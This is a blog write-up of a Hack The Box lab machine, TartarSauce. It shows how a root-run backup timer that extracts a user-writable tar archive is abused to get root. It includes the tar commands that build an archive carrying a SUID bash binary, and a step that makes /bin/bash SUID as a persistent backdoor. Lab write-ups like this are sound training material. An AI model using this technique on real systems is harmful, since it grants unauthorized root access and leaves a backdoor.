Open in app

Sign in

Write

Sign in

TartarSauce HTB privesc

n00🔑
3 min readAug 1, 2021

If we can control a tar archive file which is getting extracted by root, we can escalate our privileges. Let’s see this in action ….

We start with onuma user.

Linpeas enum script detected a unusual timer.

backuperer.timer runs backuperer.service

It is running a bash script. Every 5 min

Downloaded script and added comments for better understanding

  1. In Line no.36 backup of /var/www/html is created and archived into a file with random name in /var/tmp. Then due to & this process runs in background and most important thing to note is it is running as our user onuma.(Due to this reason we can modify this temporary archive file and can replace it with our own malicious .tar.gz file)
  2. In Line no.52 this file is extracted.
  3. In Line no.53 integrity_chk() function executes, which is doing nothing but running recursive diff for checking if there are changes to folders of /var/www/html .

Let’s understand this with the examples below-

if [[ $(diff -r /tmp/tester /root/Desktop/tester) ]]; then echo "Success, files/folders are changed/different"; else echo "FAIL, files/folders are same"; fi

If, difference is there then command outputs. Success. Meaning sub folders folders are different. Otherwise it outputs Failed.

Let’s see these directories-

Both /root/Desktop/tester and /tmp/temp has ps folder. Whereas /tmp/tester is empty, that’s why diff outputs Success.

4. If integrity_chk fails it removes these temporary extracted files. We don’t want that to happen, as when our malicious archive gets extracted it will be removed.

5. Let’s create a malicious archive and replace this temp archive with this.

a) I transferred /bin/bash from machine to my local system and added suid bit permissions to it as we know with bash -p we can get root when it will be extracted by the backuperer.service (Tartarsauce is 32 bit machine therefore it was required to get 32 bash binary)

b) Creating malicious archive. (tar archives preserves uid, guid and permissions of file, that’s why we are able to privesc)

mkdir -p var/www/htmlcp bash_32_bit var/www/htmltar -zcvf suid_bash.tar.gz var

c) Replacing temporary archive with our suid_bash.tar.gz

6. Persistence with root:

Then we add suid to real bin/bash. As this temporary archive will be deleted after 5 min by backuperer.service

Thanks for reading!

#23862

Author: Prabhsimran (https://www.linkedin.com/in/pswalia2u/)

References:

Htb Writeup
Linux Priv Esc
Ctf Writeup
Tartarsauce

--

--

n00🔑

Written by n00🔑

279 Followers

Computer Security Enthusiast. Usually plays HTB (ID-23862). https://www.youtube.com/@pswalia2u https://www.linkedin.com/in/pswalia2u/ Instagram @pswalia4u

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams